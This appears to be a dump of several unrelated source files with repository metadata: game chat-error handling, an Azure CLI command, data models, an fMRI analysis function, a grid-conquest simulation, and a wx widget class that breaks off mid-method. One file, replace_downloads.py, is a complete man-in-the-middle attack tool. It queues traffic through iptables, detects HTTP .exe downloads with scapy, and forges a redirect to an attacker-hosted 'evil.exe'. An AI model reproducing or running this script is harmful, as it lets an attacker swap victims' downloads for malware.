def getName(self):
return _ERRORS.getErrorName(self.errorID)
def getI18nKey(self):
return I18N_MESSENGER.chat_error(self.getName())
class _BWChat2I18nAction(I18nActionID):
def getName(self):
return _ACTIONS.getActionName(self.actionID)
def getI18nName(self):
return getChatActionName(self.actionID)
class _ActionCoolDownError(ChatCoolDownError):
def createAction(self, actionID):
return _BWChat2I18nAction(actionID)
class _BattleCommandError(IChatError):
__slots__ = ('_example', '_coolDown')
def __init__(self, command):
super(_BattleCommandError, self).__init__()
self._example = getBattleCommandExample(command.msgText)
self._coolDown = command.cooldownPeriod
class _BattleCommandCoolDownError(_BattleCommandError):
def __init__(self, command):
super(_BattleCommandCoolDownError, self).__init__(command)
self._coolDown = command.cooldownPeriod
def getMessage(self):
return i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_COMMANDINCOOLDOWN_LIMITED, self._example, self._coolDown)
class _BattleCommandGenericError(_BattleCommandError):
def getMessage(self):
return i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_COMMAND_GENERIC_ERROR, strArg1=self._example)
class _SimpleActionError(ClientActionError):
def createError(self, errorID):
return _BWChat2I18nError(errorID)
def createAction(self, actionID):
return _BWChat2I18nAction(actionID)
class _AdminCommandError(IChatError):
__slots__ = ('_error',)
def __init__(self, error):
super(_AdminCommandError, self).__init__()
self._error = error
def getMessage(self):
return i18n.makeString(I18N_MESSENGER.SERVER_ERRORS_CHATCOMMANDERROR_MESSAGE, error=self._error)
class _SimpleAdminCommandError(_AdminCommandError):
def __init__(self, errorID, kwargs = None):
super(_SimpleAdminCommandError, self).__init__(getChatErrorMessage(errorID, kwargs or {'actionName': i18n.makeString(I18N_MESSENGER.CUSTOM_CLIENT_ACTION_ADMIN_CHAT_COMMAND)}))
class _AdminCommandI18nError(_AdminCommandError):
def __init__(self, keys, kwargs):
super(_AdminCommandI18nError, self).__init__(i18n.makeString(keys, **kwargs))
class _AdminCommandCoolDownError(_AdminCommandError):
def __init__(self):
super(_AdminCommandCoolDownError, self).__init__(i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_COMMAND_IN_COOLDOWN_WO_NAME, floatArg1=_LIMITS.ADMIN_COMMANDS_FROM_CLIENT_COOLDOWN_SEC))
def createCoolDownError(actionID):
command = _ACTIONS.adminChatCommandFromActionID(actionID)
if command:
return _AdminCommandCoolDownError()
else:
command = _ACTIONS.battleChatCommandFromActionID(actionID)
if command:
return _BattleCommandCoolDownError(command)
if _ACTIONS.isRateLimitedBroadcastFromClient(actionID):
coolDown = _LIMITS.BROADCASTS_FROM_CLIENT_COOLDOWN_SEC
elif actionID == _ACTIONS.FIND_USERS_BY_NAME:
coolDown = _LIMITS.FIND_USERS_BY_NAME_REQUEST_COOLDOWN_SEC
elif actionID == _ACTIONS.GET_VOIP_CREDENTIALS:
coolDown = _LIMITS.VOIP_CREDENTIALS_REQUEST_COOLDOWN_SEC
else:
coolDown = None
return _ActionCoolDownError(actionID, coolDown)
def createBroadcastError(args, broadcastID):
errorID = args['int32Arg1']
    if not _ACTIONS.isRateLimitedBroadcastFromClient(broadcastID):
        raise AssertionError
    if errorID == _ERRORS.IN_CHAT_BAN:
        error = ChatBanError(makeLocalServerTime(args['floatArg1']), args['strArg1'])
    elif errorID == _ERRORS.IN_COOLDOWN:
error = _ActionCoolDownError(broadcastID, _LIMITS.BROADCASTS_FROM_CLIENT_COOLDOWN_SEC)
else:
error = _SimpleActionError(broadcastID, errorID)
return error
def createAdminCommandError(args):
errorID = args['int32Arg1']
if errorID == _ERRORS.IN_COOLDOWN:
error = _AdminCommandCoolDownError()
else:
error = _SimpleAdminCommandError(errorID)
return error
def createBattleCommandError(args, command):
errorID = args['int32Arg1']
error = None
if errorID == _ERRORS.IN_COOLDOWN:
error = _BattleCommandCoolDownError(command)
elif errorID == _ERRORS.GENERIC_ERROR:
error = _BattleCommandGenericError(command)
return error
def createVOIPError(args, actionID):
errorID = args['int32Arg1']
error, logOnly = None, False
if actionID == _ACTIONS.GET_VOIP_CREDENTIALS:
if errorID == _ERRORS.IN_COOLDOWN:
error = _ActionCoolDownError(_ACTIONS.GET_VOIP_CREDENTIALS, _LIMITS.VOIP_CREDENTIALS_REQUEST_COOLDOWN_SEC)
elif errorID == _ERRORS.GENERIC_ERROR:
logOnly = True
error = 'The player has received the error to the request for getting of voip credential. Perhaps voip connection to the server is lost, the server is reconnecting to voip.'
return (error, logOnly)
def createSearchUserError(args):
errorID = args['int32Arg1']
error = None
if errorID == _ERRORS.IN_COOLDOWN:
error = _ActionCoolDownError(_ACTIONS.FIND_USERS_BY_NAME, _LIMITS.FIND_USERS_BY_NAME_REQUEST_COOLDOWN_SEC)
elif errorID in (_ERRORS.IS_BUSY, _ERRORS.WRONG_ARGS):
error = _SimpleActionError(_ACTIONS.FIND_USERS_BY_NAME, errorID)
return error
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\messenger\proto\bw_chat2\errors.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.05.01 15:25:05 Central Europe (Daylight Saving Time)
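Each create*Error factory above maps an integer error ID from the server payload onto an error object, with the cooldown case handled specially. A stripped-down sketch of that dispatch shape; the IDs and exception classes here are placeholders, not the module's real _ERRORS constants or error types:

```python
class CoolDownError(Exception):
    """Placeholder for _ActionCoolDownError."""

class ChatBanError(Exception):
    """Placeholder for the real ChatBanError."""

class SimpleActionError(Exception):
    """Placeholder for _SimpleActionError."""

# placeholder IDs, not the real _ERRORS values
IN_CHAT_BAN, IN_COOLDOWN = 100, 101

def create_broadcast_error(error_id, args):
    # dispatch on the server-provided error ID, mirroring createBroadcastError
    if error_id == IN_CHAT_BAN:
        return ChatBanError(args.get('strArg1', ''))
    if error_id == IN_COOLDOWN:
        return CoolDownError()
    return SimpleActionError(error_id)
```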
| [
"info@webium.sk"
] | info@webium.sk |
1d6d55a629040d2a4f5a21a40cb2d8c050150aa4 | a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | /src/azure-cli/azure/cli/command_modules/network/aaz/latest/network/nat/gateway/_show.py | 1f3a7021343df279377f28627289aacc60a9f5b9 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | Azure/azure-cli | 13340eeca2e288e66e84d393fa1c8a93d46c8686 | a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca | refs/heads/dev | 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 | MIT | 2023-09-14T11:11:05 | 2016-02-04T00:21:51 | Python | UTF-8 | Python | false | false | 7,741 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
"network nat gateway show",
)
class Show(AAZCommand):
"""Show details of a NAT gateway.
:example: Show details of a NAT gateway.
az network nat gateway show --resource-group MyResourceGroup --name MyNatGateway
:example: Show NAT gateway using ID.
az network nat gateway show --ids {GatewayId}
"""
_aaz_info = {
"version": "2022-01-01",
"resources": [
["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.network/natgateways/{}", "2022-01-01"],
]
}
def _handler(self, command_args):
super()._handler(command_args)
self._execute_operations()
return self._output()
_args_schema = None
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
# define Arg Group ""
_args_schema = cls._args_schema
_args_schema.name = AAZStrArg(
options=["-n", "--name"],
help="Name of the NAT gateway.",
required=True,
id_part="name",
)
_args_schema.resource_group = AAZResourceGroupNameArg(
required=True,
)
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
self.NatGatewaysGet(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
@register_callback
def post_operations(self):
pass
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
return result
class NatGatewaysGet(AAZHttpOperation):
CLIENT_TYPE = "MgmtClient"
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=False, **kwargs)
if session.http_response.status_code in [200]:
return self.on_200(session)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}",
**self.url_parameters
)
@property
def method(self):
return "GET"
@property
def error_format(self):
return "ODataV4Format"
@property
def url_parameters(self):
parameters = {
**self.serialize_url_param(
"natGatewayName", self.ctx.args.name,
required=True,
),
**self.serialize_url_param(
"resourceGroupName", self.ctx.args.resource_group,
required=True,
),
**self.serialize_url_param(
"subscriptionId", self.ctx.subscription_id,
required=True,
),
}
return parameters
@property
def query_parameters(self):
parameters = {
**self.serialize_query_param(
"api-version", "2022-01-01",
required=True,
),
}
return parameters
@property
def header_parameters(self):
parameters = {
**self.serialize_header_param(
"Accept", "application/json",
),
}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var(
"instance",
data,
schema_builder=self._build_schema_on_200
)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.etag = AAZStrType(
flags={"read_only": True},
)
_schema_on_200.id = AAZStrType()
_schema_on_200.location = AAZStrType()
_schema_on_200.name = AAZStrType(
flags={"read_only": True},
)
_schema_on_200.properties = AAZObjectType(
flags={"client_flatten": True},
)
_schema_on_200.sku = AAZObjectType()
_schema_on_200.tags = AAZDictType()
_schema_on_200.type = AAZStrType(
flags={"read_only": True},
)
_schema_on_200.zones = AAZListType()
properties = cls._schema_on_200.properties
properties.idle_timeout_in_minutes = AAZIntType(
serialized_name="idleTimeoutInMinutes",
)
properties.provisioning_state = AAZStrType(
serialized_name="provisioningState",
flags={"read_only": True},
)
properties.public_ip_addresses = AAZListType(
serialized_name="publicIpAddresses",
)
properties.public_ip_prefixes = AAZListType(
serialized_name="publicIpPrefixes",
)
properties.resource_guid = AAZStrType(
serialized_name="resourceGuid",
flags={"read_only": True},
)
properties.subnets = AAZListType(
flags={"read_only": True},
)
public_ip_addresses = cls._schema_on_200.properties.public_ip_addresses
public_ip_addresses.Element = AAZObjectType()
_ShowHelper._build_schema_sub_resource_read(public_ip_addresses.Element)
public_ip_prefixes = cls._schema_on_200.properties.public_ip_prefixes
public_ip_prefixes.Element = AAZObjectType()
_ShowHelper._build_schema_sub_resource_read(public_ip_prefixes.Element)
subnets = cls._schema_on_200.properties.subnets
subnets.Element = AAZObjectType()
_ShowHelper._build_schema_sub_resource_read(subnets.Element)
sku = cls._schema_on_200.sku
sku.name = AAZStrType()
tags = cls._schema_on_200.tags
tags.Element = AAZStrType()
zones = cls._schema_on_200.zones
zones.Element = AAZStrType()
return cls._schema_on_200
class _ShowHelper:
"""Helper class for Show"""
_schema_sub_resource_read = None
@classmethod
def _build_schema_sub_resource_read(cls, _schema):
if cls._schema_sub_resource_read is not None:
_schema.id = cls._schema_sub_resource_read.id
return
cls._schema_sub_resource_read = _schema_sub_resource_read = AAZObjectType()
sub_resource_read = _schema_sub_resource_read
sub_resource_read.id = AAZStrType()
_schema.id = cls._schema_sub_resource_read.id
__all__ = ["Show"]
| [
"noreply@github.com"
] | Azure.noreply@github.com |
0749a6002445ed54ada4865f9d8ead88709f8e04 | 29487730c77ae4e875ed8f69d3aceef2103fc0a3 | /fatcatmap/models/abstract/event.py | c93f570669e0aaedbbc3a8c0174e8256b06fac65 | [] | no_license | sgammon/fatcatmap | 154665fdd9394e0802d1bce9d0d747f3f9bfe3b2 | 4c83d1bfc146f48ac2d1d6b240624a7ece57911e | refs/heads/master | 2021-03-30T15:41:15.837040 | 2014-12-09T20:38:50 | 2014-12-09T20:38:50 | 15,307,179 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 357 | py | # -*- coding: utf-8 -*-
'''
fcm: abstract event models
'''
# stdlib
from datetime import datetime
# graph models
from .. import (Model,
describe)
@describe(abstract=True)
class Event(Model):
''' Specifies an action that occurred at a specific (or
vague) single moment in time. '''
occurred = datetime, {'indexed': True}
| [
"sam@momentum.io"
] | sam@momentum.io |
311119c4a533fb84b1644a51b05a305f2728fa5b | bd58eb56167680e5c07c1e6e630c03f2f73a3647 | /replace_downloads/replace_downloads.py | ab5264c1faddd4658ae864b61571d3c4340698b5 | [] | no_license | denier1025/PycharmProjects | 40e7ac879993e2e4b0ad7b0c547790a2554406eb | 411f8ae04c4ba4f6835d2cd66b5490223a863b2f | refs/heads/master | 2020-03-27T06:14:39.127989 | 2018-09-10T19:51:24 | 2018-09-10T19:51:24 | 146,091,707 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,671 | py | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import subprocess
import argparse
ack_list = []
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("-c0", "--chain0", dest="chain_name0", help="Chain name: FORWARD, OUTPUT, INPUT etc.")
parser.add_argument("-c1", "--chain1", dest="chain_name1", help="Chain name: FORWARD, OUTPUT, INPUT etc.")
parser.add_argument("-qn", "--queue-num", dest="queue_num", help="Queue number: 0, 1, 3 etc.")
options = parser.parse_args()
if not options.chain_name0:
parser.error("Please, specify a chain name, use --help for more info")
elif not options.queue_num:
parser.error("Please, specify a queue number, use --help for more info")
else:
if ("OUTPUT" or "INPUT") == options.chain_name0:
if not options.chain_name1:
parser.error("Please, specify a chain name, use --help for more info")
return options
def presets_for_intercept_and_modify_packets(options):
if options.chain_name1:
subprocess.call(["iptables", "-I", options.chain_name1, "-j", "NFQUEUE", "--queue-num", options.queue_num])
subprocess.call(["iptables", "-I", options.chain_name0, "-j", "NFQUEUE", "--queue-num", options.queue_num])
def flush_presets():
subprocess.call("iptables --flush", shell=True)
def set_load_link(packet, load_link):
packet[scapy.Raw].load = "HTTP/1.1 301 Moved Permanently\r\nLocation: " + load_link + "\r\n\r\n"
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if ".exe" in scapy_packet[scapy.Raw].load:
print("exe Request")
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("Replacing file")
modified_packet = set_load_link(scapy_packet, "http://10.0.2.15/files/evil.exe")
packet.set_payload(str(modified_packet))
packet.accept()
options = get_args()
presets_for_intercept_and_modify_packets(options)
try:
queue = netfilterqueue.NetfilterQueue()
queue.bind(int(options.queue_num), process_packet)
queue.run()
except KeyboardInterrupt:
print("\nDetecting 'CTRL+C'... Flushing IP-tables... Please wait...")
flush_presets()
print("IP-tables were flushing successfully!") | [
"root@localhost.localdomain"
] | root@localhost.localdomain |
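The file-replacement trick in replace_downloads.py above hinges on rewriting the server's HTTP response into a bare 301 redirect, then deleting the IP/TCP length and checksum fields so scapy recomputes them. The payload construction can be exercised on its own (scapy-free sketch; the redirect URL is just the example used in the script):

```python
def build_redirect_payload(location):
    """Build the minimal HTTP/1.1 301 response used to redirect a download."""
    return "HTTP/1.1 301 Moved Permanently\r\nLocation: " + location + "\r\n\r\n"
```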
f55d7cfc44bac29fc91d4cf46061f70481c026ed | e0b6f5bd451aa8af3273fbc948799637681342e1 | /scripts/wm_representation/functions/IEM/tools/Weights_matrix_LM_3items.py | 423fd194f89fcea7ee5da1725dfd4a8d6bacfb41 | [] | no_license | davidbestue/encoding | 6b304f6e7429f94f97bd562c7544d1fdccf7bdc1 | c27319aa3bb652b3bfc6b7340044c0fda057bc62 | refs/heads/master | 2022-05-05T23:41:42.419252 | 2022-04-27T08:34:52 | 2022-04-27T08:34:52 | 144,248,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,184 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 29 13:05:33 2019
@author: David
"""
import sys, os
path_tools = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
sys.path.insert(1, path_tools)
from tools import *
def Weights_matrix_LM_3items( training_data, training_angles ):
# no intercept
# no regressors scaling
# training_angles is a vector of [a1, a2, a3]
#####
start_train_weights = time.time()
#####
n_voxels = np.shape(training_data)[1]
### Expected activity from the model
M_model=[] #matrix of the activity from the model
for i in range(len(training_angles)):
        channel_values1=f(training_angles[i][0]) #f #f_quadrant (function that generates the expected response in each channel)
channel_values2=f(training_angles[i][1])
channel_values3=f(training_angles[i][2])
channel_values = np.array(channel_values1) + np.array(channel_values2) + np.array(channel_values3)
channel_values = list(channel_values)
M_model.append(channel_values)
M_model=pd.DataFrame(np.array(M_model)) # (trials, channel_activity)
channel_names = ['ch_' +str(i+1) for i in range(0, len(pos_channels))] #names of the channels
M_model.columns=channel_names
#### 2. Train the model and get matrix of weights
Matrix_weights=np.zeros(( n_voxels, len(pos_channels) )) # (voxels, channels) how each channels is represented in each voxel
for voxel_x in range(0, n_voxels): #train each voxel
# set Y and X for the GLM
Y = training_data[:, voxel_x] ## Y is the real activity
X = M_model #_zscored #M_model ## X is the hipothetycal activity
##
a = sm.OLS(Y, X )
resul = a.fit()
betas= resul.params
Matrix_weights[voxel_x, :]=betas
#Save the matrix of weights
Matrix_weights =pd.DataFrame(Matrix_weights) #convert the array to dataframe
end_train_weights = time.time()
process_train_weights = end_train_weights - start_train_weights
##print( 'Time train Weights: ' +str(process_train_weights))
Inter = False #intercept true or false
return Matrix_weights, Inter
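The per-voxel sm.OLS loop in Weights_matrix_LM_3items above is, with no intercept, a single multi-target least-squares solve. A numpy-only sketch of the same estimation; a random design matrix stands in for the channel responses that f() and pos_channels from tools would generate:

```python
import numpy as np

def train_weights(training_data, model_matrix):
    """Solve training_data ~ model_matrix @ weights.T for every voxel at once;
    equivalent to looping sm.OLS over voxels with no intercept."""
    coef, _, _, _ = np.linalg.lstsq(model_matrix, training_data, rcond=None)
    return coef.T  # (n_voxels, n_channels), like Matrix_weights

# synthetic check: 40 trials x 8 channels, 5 voxels, noiseless data
rng = np.random.default_rng(0)
M = rng.random((40, 8))       # hypothetical channel responses per trial
W_true = rng.random((5, 8))   # voxel-by-channel weights to recover
Y = M @ W_true.T
W_hat = train_weights(Y, M)
```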
| [
"davidsanchezbestue@hotmail.com"
] | davidsanchezbestue@hotmail.com |
7346dc2a4751f2adbec6fe72f886800613002c7e | b1bab1dca289b2447c0b7a6b2e41f6e61fc048df | /TEST/A형모의삼국지.py | 0f97c63d8257949edae6a7aa5415e57818df7f28 | [] | no_license | DongChanKIM2/Algorithm | bf267ddf4234f0da6552a559f43cac073e7ca133 | 2613462f65a2cda7e32c6f96cee2cd67733c9883 | refs/heads/main | 2023-08-24T10:46:12.330145 | 2021-10-11T06:31:56 | 2021-10-11T06:31:56 | 356,710,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,469 | py | #1. 땅따먹기 게임
# Rule 1. Mountain terrain is always 0
# Rule 2. Forces are divided into main / auxiliary troops
# Rule 3. Attack -> support -> resupply (country 1 -> country 2 -> country 3); a country with no troops is skipped
# Rule 4. Attack: on my turn, if (adjacent enemy cell's troops * 5) < (my country's troops), each adjacent friendly cell sends 1/4 of its troops to attack
# i.e. an attack is launched only when the invasion is certain to succeed
# Rule 5. Support:
# 5-1. If no other country is adjacent, send 1/5 of the troops to the adjacent cells
# 5-2. If another country is adjacent, send 1/5 of the troops only when ours exceed 5 times the neighbour's
# Rule 6. Game over: when only one country remains
# Turn order: Pa -> Cho -> Ju
dx = [1, -1, 0, 0]
dy = [0, 0, 1, -1]
# Attacking in sequence would split the attacking troops, so:
# 1. From each enemy cell, do a four-direction scan to decide whether it gets attacked (attack function)
# 2. From the friendly side, the attack must then be applied all at once (adjacent_cnt arr)
def attack(which_country):
for i in range(N):
for j in range(N):
conquerd_arr[i][j] = 0
for i in range(N):
for j in range(N):
            # find enemy cells that are not mountain terrain
if arr[i][j] != which_country and arr[i][j] != 0:
cnt = 0
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
                    # from the enemy cell, scan the four directions and sum the adjacent friendly troops
if arr[nx][ny] == which_country:
cnt += military[nx][ny]
if cnt > (military[i][j] * 5):
conquerd_arr[i][j] = 1
def send(which_country):
for i in range(N):
for j in range(N):
adjacent_cnt_arr[i][j] = 0
    # count how many times each troop-sending cell has to send troops
for i in range(N):
for j in range(N):
if conquerd_arr[i][j] == 1:
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if arr[nx][ny] == which_country:
adjacent_cnt_arr[nx][ny] += 1
    # now carry out the actual invasion
for i in range(N):
for j in range(N):
if conquerd_arr[i][j] == 1:
send_military_cnt = 0
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if adjacent_cnt_arr[nx][ny] > 0:
send_military_cnt += int(military[nx][ny] * (1/4))
military[i][j] = send_military_cnt - military[i][j]
                # update the owner of the cell
arr[i][j] = which_country
                # update its troops as well
military[i][j] = int(military[i][j])
    # also subtract the troops that were sent away
for i in range(N):
for j in range(N):
if adjacent_cnt_arr[i][j] > 0:
military[i][j] -= adjacent_cnt_arr[i][j] * int(military[i][j] * (1/4))
# int(((adjacent_cnt_arr[i][j]/4) * military[i][j]))
military[i][j] = int(military[i][j])
adjacent_cnt_arr[i][j] = 0
conquerd_arr[i][j] = 0
# Handle support first (resupply comes after this)
# Rule 5. Support:
# 5-1. If no other country is adjacent, send 1/5 of the troops to the adjacent cells
# 5-2. If another country is adjacent, send 1/5 of the troops only when ours exceed 5 times the neighbour's
# Ah... on second thought, 5-1 and 5-2 must not run sequentially; they have to happen simultaneously.. shit...
# The right approach is to build temp_military, accumulate the 5-1 / 5-2 deltas there, and merge temp_military in at the end
def advocate(which_country):
for i in range(N):
for j in range(N):
temp_military[i][j] = 0
    # implement 5-1 first
for i in range(N):
for j in range(N):
if arr[i][j] == which_country:
flag = 0
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if arr[nx][ny] == 0:
continue
if arr[nx][ny] != arr[i][j]:
flag = 1
                # case: only friendly cells on all four sides
cnt = 0
if flag == 0:
                    # send the troops out
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if arr[nx][ny] == which_country:
temp_military[nx][ny] += int(military[i][j] * 0.2)
cnt += 1
                    # subtract the sent troops from this cell
temp_military[i][j] -= int(military[i][j] * 0.2) * cnt
# print('---', int(military[i][j] * (0.2)))
# temp_military[i][j] = int(temp_military[i][j])
                # case: an enemy cell is among the four neighbours
elif flag == 1:
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if arr[nx][ny] == which_country:
if military[i][j] > military[nx][ny] * 5:
temp_military[nx][ny] += int(military[i][j] * 0.2)
# temp_military[nx][ny] = int(temp_military[nx][ny])
temp_military[i][j] -= int(military[i][j] * 0.2)
# temp_military[i][j] = int(temp_military[i][j])
for i in range(N):
for j in range(N):
military[i][j] += temp_military[i][j]
def suppling():
for i in range(N):
for j in range(N):
military[i][j] += supply[i][j]
# Pa: 1, Cho: 2, Ju: 3
T = int(input())
for tc in range(T):
N = int(input())
arr = [list(map(int, input().split())) for _ in range(N)]
military = [list(map(int, input().split())) for _ in range(N)]
supply = [list(map(int, input().split())) for _ in range(N)]
    # arr marking cells that have been invaded
conquerd_arr = [[0] * N for _ in range(N)]
    # arr marking the cells that send attacking troops
adjacent_cnt_arr = [[0] * N for _ in range(N)]
    # arr used during support to combine cells adjacent to the enemy with those that are not
temp_military = [[0] * N for _ in range(N)]
ans = 0
temp = 0
first = 0
second = 0
third = 0
zero = 0
while True:
if first + zero == N ** 2:
break
if second + zero == N ** 2:
break
if third + zero == N ** 2:
break
first = 0
second = 0
third = 0
zero = 0
execute = 0
temp += 1
if temp >= 4:
temp -= 3
idx = temp
for i in range(N):
for j in range(N):
if arr[i][j] == idx:
execute = 1
if execute == 1:
attack(idx)
send(idx)
advocate(idx)
suppling()
for i in range(N):
for j in range(N):
if arr[i][j] == 0:
zero += 1
if arr[i][j] == 1:
first += 1
if arr[i][j] == 2:
second += 1
if arr[i][j] == 3:
third += 1
# print(conquerd_arr)
# print(adjacent_cnt_arr)
# print(arr)
# print(military)
# print(temp_military)
for i in range(N):
for j in range(N):
ans += military[i][j]
print('#{} {}'.format(tc+1, ans))
# print(sum(military))
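The attack rule implemented above (an enemy cell is marked in conquerd_arr when the adjacent troops of the attacking country exceed five times its garrison) can be checked in isolation. A minimal self-contained sketch of that decision, assuming the same four-direction neighbour scan:

```python
def is_conquered(grid, troops, i, j, country):
    """Return True if enemy cell (i, j) would be marked in conquerd_arr:
    the sum of adjacent troops belonging to `country` must exceed 5x its garrison."""
    n = len(grid)
    total = 0
    for di, dj in ((1, 0), (-1, 0), (0, 1), (0, -1)):
        ni, nj = i + di, j + dj
        if 0 <= ni < n and 0 <= nj < n and grid[ni][nj] == country:
            total += troops[ni][nj]
    return total > troops[i][j] * 5
```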
| [
"fromecha@gmail.com"
] | fromecha@gmail.com |
86dcef936a9635a57846cbb64347fec7aede84f9 | 562446b9c0b39dd74a079678fab235ad7f9b8fb2 | /enaml/wx/wx_group_box.py | cc12ceba9a849c5b309913381a5286bd49ec7dbe | [
"BSD-3-Clause"
] | permissive | jminardi/enaml | 2679bbb992101e07b1d780bd622c5ccb08cb329e | 78446e5163e026d9abf9568f99252615e9e2e380 | refs/heads/master | 2021-01-23T22:37:54.033419 | 2014-07-22T02:30:21 | 2014-07-22T02:30:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,127 | py | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
import wx
from atom.api import Typed
from enaml.widgets.group_box import ProxyGroupBox
from .wx_container import WxContainer, wxContainer
WX_ALIGNMENTS = {
'left': wx.ALIGN_LEFT,
'center': wx.ALIGN_CENTER,
'right': wx.ALIGN_RIGHT,
}
class wxGroupBox(wxContainer):
""" A wxContainer sublcass that implements GroupBox functionality.
"""
def __init__(self, *args, **kwargs):
""" Initialize a wxGroupBox.
Parameters
----------
*args, **kwargs
The positional and keyword arguments to initialize a
wxContainer.
"""
super(wxGroupBox, self).__init__(*args, **kwargs)
self._title = ''
self._border = wx.StaticBox(self)
self._line = wx.StaticLine(self)
self._label = wx.StaticText(self)
self._label.Raise()
self._label_size = self._label.GetBestSize()
self._title_alignment = wx.ALIGN_LEFT
self._flat = False
# Set the panel to double buffered or suffer terrible
# rendering artifacts
self.SetDoubleBuffered(True)
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def GetAlignment(self):
""" Return the wx alignment flag for the current alignment
of the group box title.
"""
return self._title_alignment
def SetAlignment(self, alignment):
""" Set the alignment of the title of the group box. Should
be one of wx.ALIGN_LEFT, wx.ALIGN_RIGHT, wx.ALIGN_CENTER.
"""
self._title_alignment = alignment
self._update_layout()
def GetFlat(self):
""" Returns a boolean indicating whether the group box is using
a flat style.
"""
return self._flat
def SetFlat(self, flat):
""" Set whether or not the group box should be displayed using
a flat style.
"""
self._flat = flat
if flat:
self._border.Show(False)
self._line.Show(True)
else:
self._border.Show(True)
self._line.Show(False)
self._update_layout()
def GetTitle(self):
""" Return the current title text in the group box.
"""
# Undo the hack applied in SetTitle(...)
title = self._title
if title:
title = title[1:-1]
return title
def SetTitle(self, title):
""" Set the current title text in the group box.
"""
# A bit of a hack to give us a little padding around the label
if title:
title = ' %s ' % title
self._title = title
self._label.SetLabel(title)
self._label_size = self._label.GetBestSize()
if not title:
self._label.Show(False)
else:
self._label.Show(True)
self._update_layout()
def SetDimensions(self, x, y, width, height):
""" Overridden parent class method to synchronize the group
box decorations.
"""
super(wxGroupBox, self).SetDimensions(x, y, width, height)
self._update_layout()
def SetSize(self, size):
""" Overridden parent class method to synchronize the group
box decorations.
"""
super(wxGroupBox, self).SetSize(size)
self._update_layout()
def GetContentsMargins(self):
""" Get the contents margins for the group box.
These margins are computed empirically so that they look similar
to the margins provided by Qt on Windows.
Returns
-------
result : tuple
The top, right, bottom, and left margin values.
"""
label = self._label
height = label.GetCharHeight()
if not label.IsShown():
height /= 2
return (height, 1, 1, 1)
#--------------------------------------------------------------------------
# Private API
#--------------------------------------------------------------------------
def _update_layout(self):
""" Synchronizes the drawing of the group box decorations with
the panel.
"""
if self._flat:
self._update_line_geometry()
else:
self._update_border_geometry()
self._update_title_geometry()
self.Refresh()
def _update_border_geometry(self):
""" Updates the geometry of the border.
"""
width, height = self.GetSizeTuple()
self._border.SetSizeWH(width, height)
def _update_line_geometry(self):
""" Updates the geometry of the line.
"""
y = self._label_size.GetHeight() / 2
width, _ = self.GetSizeTuple()
self._line.SetDimensions(0, y, width, 2)
def _update_title_geometry(self):
""" Updates the geometry of the title.
"""
label = self._label
flat = self._flat
